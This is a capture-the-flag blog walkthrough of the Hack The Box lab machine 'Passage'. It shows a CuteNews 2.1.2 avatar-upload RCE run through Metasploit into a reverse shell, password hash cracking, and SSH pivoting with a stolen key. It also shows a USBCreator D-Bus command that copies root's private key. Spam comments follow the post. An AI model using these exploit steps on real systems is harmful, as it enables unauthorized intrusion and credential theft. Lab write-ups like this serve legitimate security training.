#summary

  • OS: Linux
  • Difficulty: Medium
  • Points: 30
  • Release: 05 Sep 2020
  • IP: 10.10.10.206

Bloods claimed on Passage

User Blood: qtc 00 days, 00 hours, 19 mins, 35 seconds.

Root Blood: Lemming 00 days, 00 hours, 32 mins, 04 seconds.



#reconnaissance

| nmap

So, I start as default, with nmap.

[email protected]:~/Desktop/HTB/passage$ nmap -A -sV -sC -v -oN passage_nmap --min-rate=10000 10.10.10.206

A few seconds later I get a report:

Not so much, but enought. Let’s research port 80.

Making host entries:



#enumeration

| web

By footer it define as CuteNews CMS. Second, we see that I can’t fuzz url, because fail2ban.

Walking through the site, we find logging page and that the site is running CuteNews version 2.1.2.

Register here, and lets look for some exploits by searchsploit:

[email protected]:~/Desktop/HTB/passage$ searchsploit cutenews 2.1.2

and found



#exploitation

| cutenews-rce

As I can see in Personal options, we have possibility to upload avatar for my profile:

So, will try exploit “CuteNews 2.1.2 – ‘avatar’ Remote Code Execution”. First, we need find root directory of msf:

locate metasploit | grep "multi/"

So, go to /usr/share/metasploit-framework/modules/exploits/multi/http/, and mirror the exploit in the directory:

searchsploit -m 46698

Rename this, for example:

sudo mv 46698.rb cutenews_212_rce.rb

Also, this script have error – no comma at the end of the line, need fix it:

['URL', 'http://pentest.com.tr/exploits/CuteNews-2-1-2-Remote-Code-Execution-Metasploit.html'],


Starting msfconsole in terminal, and configure:

msf5 > search cutenews
msf5 > use 0
msf5 exploit(multi/http/cutenews_212_rce) > set RHOSTS 10.10.10.206
msf5 exploit(multi/http/cutenews_212_rce) > set PASSWORD [email protected]#
msf5 exploit(multi/http/cutenews_212_rce) > set USERNAME user
msf5 exploit(multi/http/cutenews_212_rce) > run

Where I use my username and password. Not forget to check your LHOST 🙂


msf5 exploit(multi/http/cutenews_212_rce) > run

[*] Started reverse TCP handler on 10.10.19.30:4444 [] http://10.10.10.206:80 - CuteNews is 2.1.2
[+] Authentication was successful with user: user
[*] Trying to upload kgxhvyei.php
[+] Upload successfully.
[*] Sending stage (38288 bytes) to 10.10.10.206
[*] Meterpreter session 1 opened (10.10.19.30:4444 -> 10.10.10.206:33594) at 2020-09-16 23:43:29 -0400

meterpreter > shell
Process 2351 created.
Channel 0 created.
whoami
www-data

And do TTY: python -c "import pty; pty.spawn('/bin/bash')"



#privilege escalation

To simplify your tasks in the future, I will leave this hint here – click on image to preview


| user

Looking around, we see that machine has two users under the /home directory:
* Nadav
* Paul
And we can list the directory of Paul that contains user.txt file, but directory listing of Nadav isn’t allowed.

So, after more enumiration, I found file list with base64 in /var/www/html/CuteNews/cdata/users. Lets encode it:

for line in $(cat *|grep -v php);do echo -n $line | base64 -d && echo "\r"; done


Lets pay attention on lines:

hashid and Cyberchef said what it is sha256.

Decrypt this hashs with john: sudo john --format=Raw-SHA256 paul.hash

[email protected]:atlanta1

Here I get user.txt in console.


| user2

In ~/.ssh we can found private key id_rsa. I copy him on my pc, and did:

[email protected]:/tmp$ chmod 600 paul_id_rsa
[email protected]:/tmp$ ssh -i paul_id_rsa [email protected]

Btw, user nadav in the authorized_keys in .ssh. So nadav can ssh into user paul without password. Maybe paul can do that too:

ssh [email protected]

And have sucsess! 😉


| root

Here Im enumirated priveleged process:

find / -perm -u=s -type f 2>/dev/null


Among them is a sensitive program: dbus-daemon-launch-helper.

Google it – gdbus privilege escalation

Found – https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/

This tool can be used, among other things, to copy files between locations. The input to the method _builtin_dd is taken directly from user input. Furthermore, no path sanitation checks are performed on the source or target path, and no password prompts are being used – this allows a user to overwrite arbitrary files on the filesystem, as root, with no password prompting.


Get and use root id_rsa:

[email protected]:/tmp$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/id_rsa true

Last step – connect as root, and receive root.txt.



#thanks

Last modified: 28.06.2021

Author

Comments

turkce dublaj 

Hello, this weekend is nice for me, as this point in time i am reading this fantastic informative article here at my home. Jc Schwartzberg

kacak bahis siteleri 

Wow cuz this is excellent work! Congrats and keep it up. Rupert Vong

Fine way of explaining, and fastidious article to take data regarding my presentation subject, which i am going to present in university. Davis Hewes

online bahis 

Card can be found and a bit more complicated than that. Stuart Stingle

bets10 giri 

Great line up. We will be linking to this great article on our site. Keep up the good writing. Jude Rogne

turkce dublaj 

I was reading through some of your posts on this internet site and I conceive this website is very instructive! Keep posting . Willian Kellen

turkce dublaj 

Incredible points. Outstanding arguments. Keep up the great work. Ignacio Druck

I see something really interesting about your website so I saved to my bookmarks . Jess Merriam

kacak bahis siteleri 

Hi Dear, are you truly visiting this web site regularly, if so then you will definitely obtain good knowledge. Alfred Gafanha

Write a Reply or Comment

Your email address will not be published.